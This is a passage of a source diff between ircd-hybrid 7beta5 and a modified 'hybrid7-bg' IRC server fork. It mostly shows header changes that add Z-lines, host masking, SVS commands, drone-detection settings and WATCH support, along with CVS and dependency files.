diff -uNrd ircd-hybrid-7beta5/include/s_conf.h hybrid7-bg/include/s_conf.h
--- ircd-hybrid-7beta5/include/s_conf.h	Mon May  7 11:50:29 2001
+++ hybrid7-bg/include/s_conf.h	Fri Jul 19 00:21:48 2002
@@ -19,7 +19,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: s_conf.h,v 7.118 2001/05/07 15:50:29 toot Exp $
+ * $Id: s_conf.h,v 1.16 2002/07/19 04:21:48 Administrator Exp $
  */
 
 #include "setup.h"
@@ -100,6 +100,7 @@
 #define CONF_XLINE             0x40000
 #define CONF_ULINE             0x80000
 #define CONF_EXEMPTDLINE      0x100000
+#define CONF_ZLINE            0x200000
 
 #define CONF_SERVER_MASK       CONF_SERVER
 #define CONF_CLIENT_MASK       (CONF_CLIENT | CONF_OPERATOR | CONF_SERVER_MASK)
@@ -132,6 +133,9 @@
 #define CONF_FLAGS_PERSISTANT           0x00040000
 #define CONF_FLAGS_TEMPORARY            0x00080000
 #define CONF_FLAGS_CRYPTLINK            0x00100000
+/* additional client flag */
+#define CONF_FLAGS_MASKHOST             0x00200000
+#define CONF_FLAGS_SKIPFAIL             0x00400000
 /* Macros for struct ConfItem */
 
 #define IsLimitIp(x)            ((x)->flags & CONF_FLAGS_LIMIT_IP)
@@ -151,6 +155,8 @@
 #define IsConfEncrypted(x)      ((x)->flags & CONF_FLAGS_ENCRYPTED)
 #define IsConfCompressed(x)	((x)->flags & CONF_FLAGS_COMPRESSED)
 #define IsConfCryptLink(x)      ((x)->flags & CONF_FLAGS_CRYPTLINK)
+#define IsConfMaskHost(x)       ((x)->flags & CONF_FLAGS_MASKHOST)
+#define IsConfSkipOnPassFail(x) ((x)->flags & CONF_FLAGS_SKIPFAIL)
 
 /* port definitions for Opers */
 
@@ -164,6 +170,11 @@
 #define CONF_OPER_DIE           0x0080
 #define CONF_OPER_ADMIN         0x0100
 
+#define MAXNETID 6
+#define MAXDREASON 120
+
+#define REPGRACEDEF 20
+
 typedef struct config_file_entry
 {
   char *dpath;          /* DPATH if set from command line */
@@ -183,6 +194,10 @@
   char fname_operlog[MAXPATHLEN];
   char fname_userlog[MAXPATHLEN];
   char fname_foperlog[MAXPATHLEN];
+
+  char netid[MAXNETID + 1];
+  char drone_reason[MAXDREASON + 1];
+  char spawn_pass[PASSWDLEN + 1];
 	
   MessageFile helpfile;
   MessageFile motd;
@@ -226,6 +241,22 @@
   int         persist_expire;
   int         min_nonwildcard;
   int         default_floodcount;
+
+  int         cyrillic;
+  int         totaltrans;
+  int		  grace_time;
+  int         spam_wait;
+
+  int         repeat_grace;
+
+  int         drone_kline;
+  int         drone_batch;
+  int         drone_rate_max;
+  int         drone_rate_period;
+  int         drone_kline_time;
+
+  long		sframe;
+
 } ConfigFileEntryType;
 
 struct server_info
@@ -313,6 +344,8 @@
 
 extern int find_q_conf(char*, char*, char *);
 extern int find_u_conf(char*, char*, char *);
+
+extern int find_z_conf(char *);
 extern struct ConfItem *find_x_conf(char*);
 
 extern struct ConfItem* find_tkline(const char*, const char*, struct irc_inaddr *); 
@@ -324,6 +357,19 @@
 extern void report_specials(struct Client* source_p, int flags, int numeric);
 extern void report_qlines(struct Client* client_p);
 
+extern void report_zlines(struct Client* client_p);
+extern void report_equivs(struct Client* client_p);
+extern void add_equiv_nicks(char *);
+extern char *get_equiv_nick(char *, char *);
+
+extern void add_userpar_param(char *);
+extern void report_userparms(struct Client *);
+extern int IsUserPar(char *, char *);
+
+extern void add_relay_server(char *);
+extern void report_relays(struct Client *);
+extern int IsRelay(struct Client *);
+
 extern void yyerror(char *);
 extern int conf_yy_fatal_error(char *);
 extern int conf_fbgets(char *, int, FBFILE *);
@@ -354,6 +400,8 @@
 extern void conf_add_d_conf(struct ConfItem *);
 extern void conf_add_x_conf(struct ConfItem *);
 extern void conf_add_u_conf(struct ConfItem *);
+
+extern void conf_add_z_conf(struct ConfItem *);
 extern void conf_add_q_conf(struct ConfItem *);
 extern void conf_add_fields(struct ConfItem*, char*, char *, char*, char *,char *);
 extern void conf_add_conf(struct ConfItem *);
diff -uNrd ircd-hybrid-7beta5/include/s_debug.h hybrid7-bg/include/s_debug.h
--- ircd-hybrid-7beta5/include/s_debug.h	Tue Dec  5 01:32:58 2000
+++ hybrid7-bg/include/s_debug.h	Tue Jun  5 12:35:44 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: s_debug.h,v 7.2 2000/12/05 06:32:58 db Exp $
+ *   $Id: s_debug.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_s_debug_h
 #define INCLUDED_s_debug_h
diff -uNrd ircd-hybrid-7beta5/include/s_gline.h hybrid7-bg/include/s_gline.h
--- ircd-hybrid-7beta5/include/s_gline.h	Thu Jan  4 11:10:05 2001
+++ hybrid7-bg/include/s_gline.h	Tue Jun  5 12:35:44 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: s_gline.h,v 7.7 2001/01/04 16:10:05 davidt Exp $
+ * $Id: s_gline.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 
 #ifndef INCLUDED_s_gline_h
diff -uNrd ircd-hybrid-7beta5/include/s_log.h hybrid7-bg/include/s_log.h
--- ircd-hybrid-7beta5/include/s_log.h	Wed Nov 29 16:18:30 2000
+++ hybrid7-bg/include/s_log.h	Tue Jun  5 12:35:44 2001
@@ -17,7 +17,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: s_log.h,v 7.6 2000/11/29 21:18:30 db Exp $
+ * $Id: s_log.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_s_log_h
 #define INCLUDED_s_log_h
diff -uNrd ircd-hybrid-7beta5/include/s_misc.h hybrid7-bg/include/s_misc.h
--- ircd-hybrid-7beta5/include/s_misc.h	Tue Dec  5 01:32:59 2000
+++ hybrid7-bg/include/s_misc.h	Mon Jul 22 19:56:37 2002
@@ -1,5 +1,5 @@
 /*
- * $Id: s_misc.h,v 7.4 2000/12/05 06:32:59 db Exp $ 
+ * $Id: s_misc.h,v 1.6 2002/07/22 23:56:37 Administrator Exp $ 
  */
 
 #ifndef INCLUDED_s_misc_h
@@ -9,6 +9,16 @@
 #define INCLUDED_sys_types_h
 #endif
 
+#define CHECK_DRONE_TIME 3
+#define GRACE_TIME_DEFAULT 10
+#define SPAM_WAIT_DEFAULT 5
+
+#define DRONEMAX 20
+
+#define DRONE_RMAX_DEF 3
+#define DRONE_RPERIOD_DEF 20
+#define DRONE_KTIME_DEF 300*60
+
 struct Client;
 struct ConfItem;
 
@@ -16,6 +26,12 @@
 extern char*   date(time_t);
 extern const char* smalldate(time_t);
 extern char    *small_file_date(time_t);
+
+extern void check_warn_drone(void *);
+extern void check_drone_queue(void *);
+extern void purge_repeats(void *);
+
+extern void do_plugin(char *, char *);
 
 #endif
 
diff -uNrd ircd-hybrid-7beta5/include/s_serv.h hybrid7-bg/include/s_serv.h
--- ircd-hybrid-7beta5/include/s_serv.h	Sat May  5 17:50:35 2001
+++ hybrid7-bg/include/s_serv.h	Mon Jul 22 19:56:38 2002
@@ -17,7 +17,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: s_serv.h,v 7.42 2001/05/05 21:50:35 fl_ Exp $
+ * $Id: s_serv.h,v 1.8 2002/07/22 23:56:38 Administrator Exp $
  *
  */
 #ifndef INCLUDED_serv_h
@@ -62,6 +62,7 @@
 #define CAP_CHW         0x00000010      /* Can do channel wall @# */
 #define CAP_LL          0x00000020      /* Can do lazy links */
 #define CAP_IE          0x00000040      /* Can do invite exceptions */
+#define CAP_SW			0x00000080		/* Can do word substitutes */
 #define CAP_EOB	        0x00000100      /* Can do EOB message */
 #define CAP_KLN	        0x00000200      /* Can do KLINE message */
 #define CAP_GLN	        0x00000400      /* Can do GLINE message */
@@ -69,12 +70,17 @@
 #define CAP_HUB         0x00001000      /* This server is a HUB */
 #define CAP_AOPS        0x00002000      /* Can do anon ops (+a) */
 #define CAP_UID         0x00004000      /* Can do UIDs */
-#define CAP_ZIP		0x00008000	/* Can do ZIPlinks */
+#define CAP_ZIP		    0x00008000	    /* Can do ZIPlinks */
 #define CAP_CRYPT       0x00010000      /* Can do CRYPTlinks */
 
-#define CAP_MASK        CAP_QS|CAP_EX|CAP_CHW|\
+#define CAP_HOSTMASK	0x00020000	    /* Can do host masking */
+#define CAP_SVS         0x00040000      /* Can do SVS commands */
+#define CAP_IP          0x00080000      /* Can do IP relay */
+
+#define CAP_MASK        CAP_QS|CAP_EX|CAP_CHW|CAP_SW|\
                         CAP_IE|CAP_EOB|CAP_KLN|CAP_GLN|\
-                        CAP_HOPS|CAP_AOPS|CAP_UID
+                        CAP_HOPS|CAP_AOPS|CAP_UID|\
+						CAP_HOSTMASK|CAP_SVS|CAP_IP
 
 #define DoesCAP(x)      ((x)->caps)
 
@@ -131,7 +137,9 @@
 extern void        cryptlink_init(struct Client *client_p,
                                   struct ConfItem *aconf, int fd);
 extern void        cryptlink_regen_key(void *);
-extern void        cryptlink_error( struct Client *client_p, char *reason );    
+extern void        cryptlink_error( struct Client *client_p, char *reason );  
+
+extern void do_spawn(int, char *);
 
 extern struct Client *uplink; /* NON NULL if leaf and is this servers uplink */
 
diff -uNrd ircd-hybrid-7beta5/include/s_stats.h hybrid7-bg/include/s_stats.h
--- ircd-hybrid-7beta5/include/s_stats.h	Thu Jan 18 12:32:16 2001
+++ hybrid7-bg/include/s_stats.h	Tue Jun  5 12:35:44 2001
@@ -18,7 +18,7 @@
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
- * $Id: s_stats.h,v 7.5 2001/01/18 17:32:16 ejb Exp $
+ * $Id: s_stats.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_s_stats_h
 #define INCLUDED_s_stats_h
diff -uNrd ircd-hybrid-7beta5/include/s_user.h hybrid7-bg/include/s_user.h
--- ircd-hybrid-7beta5/include/s_user.h	Tue May 15 05:37:59 2001
+++ hybrid7-bg/include/s_user.h	Sun Jun  9 02:06:03 2002
@@ -19,7 +19,7 @@
  *
  * "s_user.h". - Headers file.
  *
- * $Id: s_user.h,v 7.13 2001/05/15 09:37:59 toot Exp $
+ * $Id: s_user.h,v 1.3 2002/06/09 06:06:03 Administrator Exp $
  *
  */
 #ifndef INCLUDED_s_user_h
@@ -50,7 +50,7 @@
 			   char* ,char *,char *,char *);
 
 extern int   do_remote_user(char* ,struct Client* ,struct Client*,
-			    char* ,char *,char *,char *,char *);
+			    char* ,char *,char *,char *,char *,char *,char *);
 
 extern int   user_modes_from_c_to_bitmask[];
 extern void  show_isupport(struct Client *);
diff -uNrd ircd-hybrid-7beta5/include/s_zip.h hybrid7-bg/include/s_zip.h
--- ircd-hybrid-7beta5/include/s_zip.h	Mon Jan 24 17:22:26 2000
+++ hybrid7-bg/include/s_zip.h	Tue Jun  5 12:35:44 2001
@@ -19,7 +19,7 @@
  *
  * "s_zip.h". - Headers file.
  *
- * $Id: s_zip.h,v 7.3 2000/01/24 22:22:26 db Exp $
+ * $Id: s_zip.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 #ifndef INCLUDED_s_zip_h
diff -uNrd ircd-hybrid-7beta5/include/scache.h hybrid7-bg/include/scache.h
--- ircd-hybrid-7beta5/include/scache.h	Mon Mar  5 21:22:11 2001
+++ hybrid7-bg/include/scache.h	Tue Jun  5 12:35:44 2001
@@ -19,7 +19,7 @@
  *
  * "scache.h". - Headers file.
  *
- * $Id: scache.h,v 7.5 2001/03/06 02:22:11 androsyn Exp $
+ * $Id: scache.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 #ifndef INCLUDED_scache_h
diff -uNrd ircd-hybrid-7beta5/include/send.h hybrid7-bg/include/send.h
--- ircd-hybrid-7beta5/include/send.h	Thu Mar 22 00:51:49 2001
+++ hybrid7-bg/include/send.h	Tue Jun  5 12:35:44 2001
@@ -2,7 +2,7 @@
  * send.h
  * Copyright (C) 1999 Patrick Alken
  *
- * $Id: send.h,v 7.43 2001/03/22 05:51:49 ejb Exp $
+ * $Id: send.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 
 #ifndef INCLUDED_send_h
diff -uNrd ircd-hybrid-7beta5/include/serno.h hybrid7-bg/include/serno.h
--- ircd-hybrid-7beta5/include/serno.h	Thu May 17 22:33:29 2001
+++ hybrid7-bg/include/serno.h	Wed Sep 18 19:19:45 2002
@@ -1 +1 @@
-#define SERIALNUM "20010517_11"
+#define SERIALNUM "20020917_1"
diff -uNrd ircd-hybrid-7beta5/include/sprintf_irc.h hybrid7-bg/include/sprintf_irc.h
--- ircd-hybrid-7beta5/include/sprintf_irc.h	Thu Jan 11 04:30:18 2001
+++ hybrid7-bg/include/sprintf_irc.h	Tue Jun  5 12:35:44 2001
@@ -1,5 +1,5 @@
 /*
- * $Id: sprintf_irc.h,v 7.4 2001/01/11 09:30:18 a1kmm Exp $ 
+ * $Id: sprintf_irc.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $ 
  */
 
 #ifndef SPRINTF_IRC
diff -uNrd ircd-hybrid-7beta5/include/supported.h hybrid7-bg/include/supported.h
--- ircd-hybrid-7beta5/include/supported.h	Wed May 16 04:51:03 2001
+++ hybrid7-bg/include/supported.h	Wed Jul 24 09:08:17 2002
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: supported.h,v 1.10 2001/05/16 08:51:03 toot Exp $
+ * $Id: supported.h,v 1.8 2002/07/24 13:08:17 Administrator Exp $
  * 
  */
 #ifndef INCLUDED_supported_h
@@ -24,10 +24,15 @@
 #include "config.h"
 #include "channel.h"
 #include "ircd_defs.h"
+#include "client.h"
+#include "s_conf.h"
 
 #define FEATURES "KNOCK"\
                 "%s" \
                 " WALLCHOPS" \
+                " MASK SVS" \
+				" NETWORK=%s" \
+				" WATCH=%i" \
                 " MODES=%i" \
                 " MAXCHANNELS=%i" \
                 " MAXBANS=%i" \
@@ -40,9 +45,9 @@
                 " CHANMODES=%s"
                  
 #define FEATURESVALUES ConfigFileEntry.disable_vchans ? "" : " VCHANS", \
-        MAXMODEPARAMS,MAXCHANNELSPERUSER,MAXBANS, \
+        ServerInfo.network_name,MAXWATCH,MAXMODEPARAMS,MAXCHANNELSPERUSER,MAXBANS, \
         ConfigFileEntry.max_targets,NICKLEN,TOPICLEN,TOPICLEN,"#&","(ohv)@%+", \
-        "beI,k,l,imnpsta"
+        "beIw,k,l,imnpstacrxzRMC"
 
 /*
  * - from mirc's versions.txt
diff -uNrd ircd-hybrid-7beta5/include/tools.h hybrid7-bg/include/tools.h
--- ircd-hybrid-7beta5/include/tools.h	Wed Jan  3 19:31:41 2001
+++ hybrid7-bg/include/tools.h	Tue Jun  5 12:35:44 2001
@@ -5,7 +5,7 @@
  *
  * Adrian Chadd <adrian@creative.net.au>
  *
- * $Id: tools.h,v 1.7 2001/01/04 00:31:41 adrian Exp $
+ * $Id: tools.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef __TOOLS_H__
 #define __TOOLS_H__
diff -uNrd ircd-hybrid-7beta5/include/vchannel.h hybrid7-bg/include/vchannel.h
--- ircd-hybrid-7beta5/include/vchannel.h	Mon Mar  5 21:22:11 2001
+++ hybrid7-bg/include/vchannel.h	Tue Jun  5 12:35:44 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: vchannel.h,v 7.16 2001/03/06 02:22:11 androsyn Exp $
+ * $Id: vchannel.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 
 #ifndef INCLUDED_vchannel_h
diff -uNrd ircd-hybrid-7beta5/include/whowas.h hybrid7-bg/include/whowas.h
--- ircd-hybrid-7beta5/include/whowas.h	Thu Jan 18 12:32:16 2001
+++ hybrid7-bg/include/whowas.h	Tue Jun  5 12:35:44 2001
@@ -18,7 +18,7 @@
  */
 
 /*
- * $Id: whowas.h,v 7.6 2001/01/18 17:32:16 ejb Exp $
+ * $Id: whowas.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_whowas_h
 #define INCLUDED_whowas_h
diff -uNrd ircd-hybrid-7beta5/messages/CVS/Entries hybrid7-bg/messages/CVS/Entries
--- ircd-hybrid-7beta5/messages/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/messages/CVS/Entries	Wed Jul 24 18:32:00 2002
@@ -0,0 +1,5 @@
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ayb.po/1.15/Wed Jul 24 13:08:43 2002//
+/create_po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/custom.po/1.15/Wed Jul 24 13:08:43 2002//
+D/translations////
diff -uNrd ircd-hybrid-7beta5/messages/CVS/Repository hybrid7-bg/messages/CVS/Repository
--- ircd-hybrid-7beta5/messages/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/messages/CVS/Repository	Wed Jul 24 18:31:59 2002
@@ -0,0 +1 @@
+hybrid7-bg/messages
diff -uNrd ircd-hybrid-7beta5/messages/CVS/Root hybrid7-bg/messages/CVS/Root
--- ircd-hybrid-7beta5/messages/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/messages/CVS/Root	Wed Jul 24 18:31:59 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/messages/translations/CVS/Entries hybrid7-bg/messages/translations/CVS/Entries
--- ircd-hybrid-7beta5/messages/translations/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/messages/translations/CVS/Entries	Wed Jul 24 18:32:00 2002
@@ -0,0 +1,10 @@
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/README/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd-croatian.po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd-danish.po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd-dutch.po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd-german.po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd-norwegian.po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd-spanish.po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd-swedish.po/1.1.1.1/Tue Jun  5 16:35:44 2001//
+D
diff -uNrd ircd-hybrid-7beta5/messages/translations/CVS/Repository hybrid7-bg/messages/translations/CVS/Repository
--- ircd-hybrid-7beta5/messages/translations/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/messages/translations/CVS/Repository	Wed Jul 24 18:31:59 2002
@@ -0,0 +1 @@
+hybrid7-bg/messages/translations
diff -uNrd ircd-hybrid-7beta5/messages/translations/CVS/Root hybrid7-bg/messages/translations/CVS/Root
--- ircd-hybrid-7beta5/messages/translations/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/messages/translations/CVS/Root	Wed Jul 24 18:31:59 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/modules/.depend hybrid7-bg/modules/.depend
--- ircd-hybrid-7beta5/modules/.depend	Thu May 10 02:30:40 2001
+++ hybrid7-bg/modules/.depend	Wed Jul 24 09:09:36 2002
@@ -81,6 +81,15 @@
  ../include/irc_string.h ../include/sprintf_irc.h ../include/numeric.h \
  ../include/fdlist.h ../include/s_bsd.h ../include/send.h \
  ../include/msg.h ../include/parse.h ../include/modules.h
+m_conf.o: m_conf.c ../include/handlers.h ../include/client.h \
+ ../include/config.h ../include/setup.h ../include/ircd_defs.h \
+ ../include/ircd_handler.h ../include/linebuf.h ../include/tools.h \
+ ../include/channel.h ../include/res.h ../include/fileio.h \
+ ../include/../adns/adns.h ../include/ircd.h ../include/memory.h \
+ ../include/irc_string.h ../include/sprintf_irc.h ../include/common.h \
+ ../include/numeric.h ../include/send.h ../include/s_conf.h \
+ ../include/motd.h ../include/class.h ../include/s_log.h \
+ ../include/msg.h ../include/parse.h ../include/modules.h
 m_connect.o: m_connect.c ../include/handlers.h ../include/client.h \
  ../include/config.h ../include/setup.h ../include/ircd_defs.h \
  ../include/ircd_handler.h ../include/linebuf.h ../include/tools.h \
@@ -510,6 +519,24 @@
  ../include/numeric.h ../include/send.h ../include/s_conf.h \
  ../include/motd.h ../include/class.h ../include/s_log.h \
  ../include/msg.h ../include/parse.h ../include/modules.h
+m_svsnick.o: m_svsnick.c ../include/handlers.h ../include/client.h \
+ ../include/config.h ../include/setup.h ../include/ircd_defs.h \
+ ../include/ircd_handler.h ../include/linebuf.h ../include/tools.h \
+ ../include/channel.h ../include/res.h ../include/fileio.h \
+ ../include/../adns/adns.h ../include/ircd.h ../include/memory.h \
+ ../include/irc_string.h ../include/sprintf_irc.h ../include/common.h \
+ ../include/numeric.h ../include/send.h ../include/s_conf.h \
+ ../include/motd.h ../include/class.h ../include/s_log.h \
+ ../include/msg.h ../include/parse.h ../include/modules.h
+m_svshint.o: m_svshint.c ../include/handlers.h ../include/client.h \
+ ../include/config.h ../include/setup.h ../include/ircd_defs.h \
+ ../include/ircd_handler.h ../include/linebuf.h ../include/tools.h \
+ ../include/channel.h ../include/res.h ../include/fileio.h \
+ ../include/../adns/adns.h ../include/ircd.h ../include/memory.h \
+ ../include/irc_string.h ../include/sprintf_irc.h ../include/common.h \
+ ../include/numeric.h ../include/send.h ../include/s_conf.h \
+ ../include/motd.h ../include/class.h ../include/s_log.h \
+ ../include/msg.h ../include/parse.h ../include/modules.h
 m_testline.o: m_testline.c ../include/handlers.h ../include/client.h \
  ../include/config.h ../include/setup.h ../include/ircd_defs.h \
  ../include/ircd_handler.h ../include/linebuf.h ../include/tools.h \
@@ -596,6 +623,15 @@
  ../include/s_serv.h ../include/s_user.h ../include/send.h \
  ../include/msg.h ../include/parse.h ../include/modules.h
 m_wallops.o: m_wallops.c ../include/handlers.h ../include/client.h \
+ ../include/config.h ../include/setup.h ../include/ircd_defs.h \
+ ../include/ircd_handler.h ../include/linebuf.h ../include/tools.h \
+ ../include/channel.h ../include/res.h ../include/fileio.h \
+ ../include/../adns/adns.h ../include/ircd.h ../include/memory.h \
+ ../include/irc_string.h ../include/sprintf_irc.h ../include/numeric.h \
+ ../include/send.h ../include/s_user.h ../include/s_conf.h \
+ ../include/motd.h ../include/class.h ../include/msg.h \
+ ../include/parse.h ../include/modules.h
+m_watch.o: m_watch.c ../include/handlers.h ../include/client.h \
  ../include/config.h ../include/setup.h ../include/ircd_defs.h \
  ../include/ircd_handler.h ../include/linebuf.h ../include/tools.h \
  ../include/channel.h ../include/res.h ../include/fileio.h \
diff -uNrd ircd-hybrid-7beta5/modules/CVS/Entries hybrid7-bg/modules/CVS/Entries
--- ircd-hybrid-7beta5/modules/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/modules/CVS/Entries	Wed Sep 18 19:19:46 2002
@@ -0,0 +1,74 @@
+/.depend/1.5/Wed Jul 24 13:09:36 2002//
+/Makefile.in/1.7/Wed Jul 24 13:09:36 2002//
+/m_accept.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_admin.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_away.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_capab.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_cburst.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_challenge.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_cjoin.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_close.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_conf.c/1.14/Wed Jul 24 18:10:16 2002//
+/m_connect.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_cryptlink.c/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_die.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_dmem.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_drop.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_eob.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_error.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_gline.c/1.2/Mon Jul  2 04:11:31 2001//
+/m_help.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_info.c/1.2/Wed Jul 10 11:20:55 2002//
+/m_invite.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_ison.c/1.2/Tue Jun 11 01:40:20 2002//
+/m_join.c/1.2/Sat Dec  8 04:12:10 2001//
+/m_kick.c/1.4/Mon Jun 24 04:29:23 2002//
+/m_kill.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_kline.c/1.2/Mon Jul  2 04:11:42 2001//
+/m_knock.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_links.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_list.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_lljoin.c/1.2/Sat Dec  8 04:12:22 2001//
+/m_llnick.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_locops.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_lusers.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_mode.c/1.3/Sun Jun  9 15:15:47 2002//
+/m_motd.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_names.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_nburst.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_oper.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_operwall.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_pass.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_ping.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_pong.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_post.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_quit.c/1.6/Sun Jun  9 15:16:26 2002//
+/m_rehash.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_restart.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_server.c/1.2/Sun Feb 17 05:30:57 2002//
+/m_set.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_sjoin.c/1.7/Thu Jul 11 19:02:08 2002//
+/m_squit.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_stats.c/1.5/Sat Jun  1 07:35:39 2002//
+/m_svinfo.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_svshint.c/1.5/Wed Jul 24 13:09:37 2002//
+/m_svsnick.c/1.3/Wed Jul 24 13:09:37 2002//
+/m_testline.c/1.2/Mon Jul  2 04:11:55 2001//
+/m_time.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_topic.c/1.4/Sun Sep  9 12:15:24 2001//
+/m_trace.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_unkline.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_user.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_userhost.c/1.2/Sun Jun  2 04:57:49 2002//
+/m_users.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_version.c/1.3/Mon Jun 10 04:40:38 2002//
+/m_wallops.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_who.c/1.2/Sun Jun  2 04:57:49 2002//
+/m_whois.c/1.8/Tue Dec  4 04:21:40 2001//
+/m_whowas.c/1.1.1.1/Tue Jun  5 16:35:45 2001//
+/m_client.c/1.9/Wed Sep 18 23:19:46 2002//
+/m_message.c/1.20/Wed Sep 18 23:19:46 2002//
+/m_nick.c/1.10/Wed Sep 18 23:19:46 2002//
+/m_part.c/1.7/Wed Sep 18 23:19:46 2002//
+/m_watch.c/1.3/Wed Sep 18 23:19:46 2002//
+D
diff -uNrd ircd-hybrid-7beta5/modules/CVS/Repository hybrid7-bg/modules/CVS/Repository
--- ircd-hybrid-7beta5/modules/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/modules/CVS/Repository	Wed Jul 24 18:32:00 2002
@@ -0,0 +1 @@
+hybrid7-bg/modules
diff -uNrd ircd-hybrid-7beta5/modules/CVS/Root hybrid7-bg/modules/CVS/Root
--- ircd-hybrid-7beta5/modules/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/modules/CVS/Root	Wed Jul 24 18:32:00 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/modules/m_accept.c hybrid7-bg/modules/m_accept.c
--- ircd-hybrid-7beta5/modules/m_accept.c	Wed Apr  4 11:22:22 2001
+++ hybrid7-bg/modules/m_accept.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
